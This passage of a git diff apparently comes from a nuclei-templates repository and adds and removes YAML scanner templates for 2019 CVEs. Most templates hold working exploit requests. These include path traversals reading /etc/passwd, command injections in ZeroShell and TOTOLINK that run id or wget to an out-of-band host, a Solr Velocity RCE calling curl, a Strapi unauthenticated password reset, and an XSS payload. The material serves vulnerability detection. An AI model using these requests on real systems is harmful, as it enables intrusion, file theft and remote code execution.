madrobot + severity: critical + tags: cve,cve2019,lfi + description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI. + reference: + http://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.html + https://github.com/JameelNabbo/exploits/blob/master/Maconomy%20Erp%20local%20file%20include.txt + https://github.com/ras313/CVE-2019-12314/security/advisories/GHSA-8762-rf4g-23xm + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-12314 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-12583.yaml b/nuclei-templates/CVE-2019/cve-2019-12583.yaml new file mode 100644 index 0000000000..3f62ff75c8 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12583.yaml @@ -0,0 +1,49 @@ +id: CVE-2019-12583 + +info: + name: Zyxel ZyWall UAG/USG - Account Creation Access + author: n-thumann,daffainfo + severity: critical + description: Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the "Free Time" component. This can lead to unauthorized network access or DoS attacks. + impact: | + An attacker can exploit this vulnerability to create unauthorized accounts with administrative privileges. + remediation: | + Apply the latest firmware update provided by Zyxel to fix the vulnerability. + reference: + - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml + - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-12583 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/StarCrossPortal/scalpel + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2019-12583 + cwe-id: CWE-425 + epss-score: 0.00481 + epss-percentile: 0.75389 + cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zyxel + product: uag2100_firmware + tags: cve,cve2019,zyxel,zywall,xss + +http: + - method: GET + path: + - "{{BaseURL}}/free_time.cgi" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "free_time_redirect.cgi?u=" + - "&smsOnly=0" + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100a12874f0ef2733bc8c7f0e764fb0ca6289dcb56f72499b238b27b09caf888bb8022100db48c204ba56cf97ad35c36b148a21decd86e83cd35614cb546190faea932e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-12593.yaml b/nuclei-templates/CVE-2019/cve-2019-12593.yaml new file mode 100644 index 0000000000..0fd429f06a --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12593.yaml @@ -0,0 +1,36 @@ +id: CVE-2019-12593 + +info: + name: IceWarp <=10.4.4 - Local File Inclusion + author: pikpikcu + severity: high + description: IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal. + tags: cve,cve2019,lfi,icewarp + reference: + - https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt + - https://nvd.nist.gov/vuln/detail/CVE-2019-12593 + - http://www.icewarp.com # vendor homepage + - https://www.icewarp.com/downloads/trial/ # software link + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-12593 + cwe-id: CWE-22 + metadata: + google-dork: Powered By IceWarp 10.4.4 + +requests: + - method: GET + path: + - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini' + - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "[intl]" + - "root:x:0" diff --git a/nuclei-templates/CVE-2019/cve-2019-12616.yaml b/nuclei-templates/CVE-2019/cve-2019-12616.yaml new file mode 100644 index 0000000000..6d8e56152d --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12616.yaml @@ -0,0 +1,39 @@ +id: CVE-2019-12616 + +info: + name: phpMyAdmin CSRF + author: Mohammedsaneem,philippedelteil + description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. + severity: medium + tags: cve,cve2019,phpmyadmin,csrf + reference: + - https://www.phpmyadmin.net/security/PMASA-2019-4/ + - https://www.exploit-db.com/exploits/46982 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2019-12616 + cwe-id: CWE-352 + +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/" + + matchers-condition: and + matchers: + - type: word + words: + - "phpmyadmin.net" + - "phpMyAdmin" + condition: or + + - type: regex + regex: + - 'v=[1-4]\.[0-8]\.' # Fix in 4.9.0 + + - type: status + status: + - 200 + - 401 # password protected diff --git a/nuclei-templates/CVE-2019/cve-2019-12725.yaml b/nuclei-templates/CVE-2019/cve-2019-12725.yaml new file mode 100644 index 0000000000..aa832de42b --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12725.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-12725 + +info: + name: Zeroshell 3.9.0 Remote Command Execution + author: dwisiswant0 + severity: critical + description: | + This template exploits an unauthenticated command injection vulnerability + found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. + As sudo is configured to execute /bin/tar without a password (NOPASSWD) + it is possible to run root commands using the "checkpoint" tar options. + reference: + - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt + - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py + tags: cve,cve2019,rce,zeroshell + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-12725 + cwe-id: CWE-78 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" diff --git a/nuclei-templates/CVE-2019/cve-2019-13396.yaml b/nuclei-templates/CVE-2019/cve-2019-13396.yaml new file mode 100644 index 0000000000..fd75e5bc01 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-13396.yaml @@ -0,0 +1,49 @@ +id: CVE-2019-13396 +info: + name: FlightPath Local File Inclusion + author: 0x_Akoko,daffainfo + severity: high + description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability. + reference: + - https://www.exploit-db.com/exploits/47121 + - https://www.cvedetails.com/cve/CVE-2019-13396/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-13396 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2019-13396 + cwe-id: CWE-22 + tags: cve,cve2019,flightpath,lfi + +requests: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: token + part: body + group: 1 + internal: true + regex: + - "idden' name='form_token' value='([a-z0-9]+)'>" diff --git a/nuclei-templates/CVE-2019/cve-2019-14251.yaml b/nuclei-templates/CVE-2019/cve-2019-14251.yaml new file mode 100644 index 0000000000..6f45634cfd --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-14251.yaml @@ -0,0 +1,48 @@ +id: CVE-2019-14251 + +info: + name: T24 Web Server - Local File Inclusion + author: 0x_Akoko + severity: high + description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the T24 Web Server. + reference: + - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt + - https://vuldb.com/?id.146815 + - https://nvd.nist.gov/vuln/detail/CVE-2019-14251 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-14251 + cwe-id: CWE-22 + epss-score: 0.01653 + epss-percentile: 0.87315 + cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: temenos + product: t24 + tags: cve,cve2019,temenos,lfi,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd" + - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or + + - type: status + status: + - 200 +# digest: 490a00463044022040c8eba803c77e52db54922bfde06450c0fb7cc3c0cc1032c3fe822599c9fffc0220233980a4f9b4b7e72fb0ef52d9a6e71da7999a0fa70e891aadb1836f35ac56c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-14696.yaml b/nuclei-templates/CVE-2019/cve-2019-14696.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-14696.yaml rename to nuclei-templates/CVE-2019/cve-2019-14696.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-14974.yaml b/nuclei-templates/CVE-2019/cve-2019-14974.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-14974.yaml rename to nuclei-templates/CVE-2019/cve-2019-14974.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-15043.yaml b/nuclei-templates/CVE-2019/cve-2019-15043.yaml deleted file mode 100644 index 94b48eecc8..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-15043.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2019-15043 -info: - author: bing0o - name: Grafana unauthenticated API - severity: high - description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. - reference: - - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory - - https://community.grafana.com/t/release-notes-v6-3-x/19202 - tags: cve,cve2019,grafana - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.50 - cve-id: CVE-2019-15043 - cwe-id: CWE-306 - -requests: - - raw: - - | - POST /api/snapshots HTTP/1.1 - Host: {{Hostname}} - Connection: close - Content-Length: 235 - Accept: */* - Accept-Language: en - Content-Type: application/json - - {"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} - - matchers: - - part: body - type: word - words: - - deleteKey diff --git a/nuclei-templates/CVE-2019/cve-2019-15811.yaml b/nuclei-templates/CVE-2019/cve-2019-15811.yaml new file mode 100644 index 0000000000..f7fc8fa7f4 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-15811.yaml @@ -0,0 +1,56 @@ +id: CVE-2019-15811 + +info: + name: DomainMOD <=4.13.0 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version of DomainMOD (>=4.13.1) to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/47325 + - https://github.com/domainmod/domainmod/issues/108 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15811 + - https://zerodays.lol/ + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-15811 + cwe-id: CWE-79 + epss-score: 0.00269 + epss-percentile: 0.6713 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: domainmod + product: domainmod + tags: cve,cve2019,domainmod,xss,authenticated,edb + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")' + - 'contains(body_2, "DomainMOD")' + condition: and +# digest: 4a0a00473045022100a532186b80000e488626654fcb40a311d58c18185793c9629f659d78a883503b02205bb427d30c7b76e28114b62e911dd49a6ca7e45ce078023de343ceed89144b9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-16097.yaml b/nuclei-templates/CVE-2019/cve-2019-16097.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16097.yaml rename to nuclei-templates/CVE-2019/cve-2019-16097.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16278.yaml b/nuclei-templates/CVE-2019/cve-2019-16278.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16278.yaml rename to nuclei-templates/CVE-2019/cve-2019-16278.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-1653.yaml b/nuclei-templates/CVE-2019/cve-2019-1653.yaml deleted file mode 100644 index 3428aaef8e..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-1653.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2019-1653 - -info: - name: Unauthenticated Cisco Small Business WAN VPN Routers Sensitive Info Disclosure - author: dwisiswant0 - severity: high - tags: cve,cve2019,cisco - description: A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability. - reference: - - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info - - https://www.exploit-db.com/exploits/46262/ - - https://www.exploit-db.com/exploits/46655/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2019-1653 - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/config.exp" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "sysconfig" - part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-16759.yaml b/nuclei-templates/CVE-2019/cve-2019-16759.yaml deleted file mode 100644 index 28a33d2049..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-16759.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2019-16759 - -info: - name: RCE in vBulletin v5.0.0-v5.5.4 fix bypass - author: madrobot - severity: critical - reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vbulletin-remote-code-execution-cve-2020-7373/ - tags: cve,cve2019,vbulletin,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-16759 - cwe-id: CWE-94 - description: "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request." - -requests: - - raw: - - | - POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo(); - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "PHP Version" diff --git a/nuclei-templates/CVE-2019/CVE-2019-17503.yaml b/nuclei-templates/CVE-2019/cve-2019-17503.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-17503.yaml rename to nuclei-templates/CVE-2019/cve-2019-17503.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-17538.yaml b/nuclei-templates/CVE-2019/cve-2019-17538.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-17538.yaml rename to nuclei-templates/CVE-2019/cve-2019-17538.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-17558.yaml b/nuclei-templates/CVE-2019/cve-2019-17558.yaml new file mode 100644 index 0000000000..836b3efbdf --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-17558.yaml @@ -0,0 +1,59 @@ +id: CVE-2019-17558 +info: + name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template + author: pikpikcu,madrobot + severity: high + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558 + tags: cve,cve2019,apache,rce,solr,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.50 + cve-id: CVE-2019-17558 + cwe-id: CWE-74 + description: "Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to a Remote Code Execution through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/` directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled` by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user)." + +requests: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + + - | + POST /solr/{{core}}/config HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "update-queryresponsewriter": { + "startup": "lazy", + "name": "velocity", + "class": "solr.VelocityResponseWriter", + "template.base.dir": "", + "solr.resource.loader.enabled": "true", + "params.resource.loader.enabled": "true" + } + } + + - | + GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 + Host: {{Hostname}} + Connection: close + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 200 + + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' diff --git a/nuclei-templates/CVE-2019/cve-2019-18371.yaml b/nuclei-templates/CVE-2019/cve-2019-18371.yaml new file mode 100644 index 0000000000..62b60facee --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-18371.yaml @@ -0,0 +1,43 @@ +id: CVE-2019-18371 + +info: + name: Xiaomi Mi WiFi R3G Routers - Local file Inclusion + author: ritikchaddha + severity: high + description: | + Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication. + remediation: | + Update the firmware of the Xiaomi Mi WiFi R3G routers to the latest version, which includes a fix for the local file inclusion vulnerability. + reference: + - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html + - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py + - https://nvd.nist.gov/vuln/detail/CVE-2019-18371 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-18371 + cwe-id: CWE-22 + epss-score: 0.02376 + epss-percentile: 0.88739 + cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: mi + product: millet_router_3g_firmware + tags: cve2019,cve,lfi,router,mi,xiaomi + +http: + - method: GET + path: + - "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4a0a0047304502202ceca95e0d23de7e0a57b502dd0f9cdbcb2ff6275f928581667d5d77e31bd462022100c5340466ae8dcfee1d77f4663912ab93da119436b3e23013e6b82fa1f43129ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-18665.yaml b/nuclei-templates/CVE-2019/cve-2019-18665.yaml new file mode 100644 index 0000000000..a2a5e18794 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-18665.yaml @@ -0,0 +1,47 @@ +id: CVE-2019-18665 + +info: + name: DOMOS 5.5 - Local File Inclusion + author: 0x_Akoko + severity: high + description: | + SECUDOS DOMOS before 5.6 allows local file inclusion via the log module. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. + remediation: | + Apply the latest patch or update to a version that is not affected by this vulnerability. + reference: + - https://atomic111.github.io/article/secudos-domos-directory_traversal + - https://vuldb.com/?id.144804 + - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18665 + - https://www.cybersecurity-help.cz/vdb/SB2019110403 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-18665 + cwe-id: CWE-22 + epss-score: 0.08504 + epss-percentile: 0.93861 + cpe: cpe:2.3:a:secudos:domos:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: secudos + product: domos + tags: cve,cve2019,domos,lfi,secudos + +http: + - method: GET + path: + - "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 4a0a004730450220509c4051fe06c3b442182ccea599c293cb206f29fb380ac73d9f4b9f7515f1bb022100e913f5bb1074f270b620860b37f1772c8266d161293f835f86eb2bbfd806ddf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-18818.yaml b/nuclei-templates/CVE-2019/cve-2019-18818.yaml new file mode 100644 index 0000000000..597d2793e1 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-18818.yaml @@ -0,0 +1,52 @@ +id: CVE-2019-18818 + +info: + name: Strapi CMS - Admin password reset (Unauthenticated) + author: idealphase + description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. + reference: + - https://github.com/advisories/GHSA-6xc2-mj39-q599 + - https://www.exploit-db.com/exploits/50239 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 + severity: critical + tags: cve,cve2019,strapi,auth-bypass,intrusive + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-18818 + cwe-id: CWE-640 + +requests: + - raw: + - | + POST /admin/auth/reset-password HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/json + + {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + condition: and + words: + - '"username":' + - '"email":' + - '"jwt":' + part: body + + extractors: + - type: json + json: + - .user.username + - .user.email \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-18922.yaml b/nuclei-templates/CVE-2019/cve-2019-18922.yaml new file mode 100644 index 0000000000..c53ff3dc67 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-18922.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-18922 +info: + name: Allied Telesis AT-GS950/8 Directory Traversal + author: 0x_Akoko + severity: high + description: A Directory Traversal in the Web interface of the Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 + reference: + - https://packetstormsecurity.com/files/155504/Allied-Telesis-AT-GS950-8-Directory-Traversal.html + - https://www.cvedetails.com/cve/CVE-2019-18922 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-18922 + cwe-id: CWE-22 + tags: cve,cve2019,allied,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-19824.yaml b/nuclei-templates/CVE-2019/cve-2019-19824.yaml new file mode 100644 index 0000000000..6ae24e6e21 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-19824.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-19824 + +info: + name: TOTOLINK - Remote Code Execution + author: gy741 + severity: high + description: On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. + reference: + - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-19824 + - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-19824 + cwe-id: CWE-78 + tags: cve,cve2019,totolink,rce,router + +requests: + - raw: + - | + POST /boafrm/formSysCmd HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46cGFzc3dvcmQ= + Content-Type: application/x-www-form-urlencoded + + submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}} + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2019/cve-2019-20085.yaml b/nuclei-templates/CVE-2019/cve-2019-20085.yaml new file mode 100644 index 0000000000..605d0be619 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-20085.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-20085 + +info: + name: TVT NVMS 1000 - Directory Traversal + author: daffainfo + severity: high + description: TVT NVMS-1000 devices allow GET /.. Directory Traversal + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 + - https://www.exploit-db.com/exploits/48311 + tags: cve,cve2019,iot,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-20085 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - 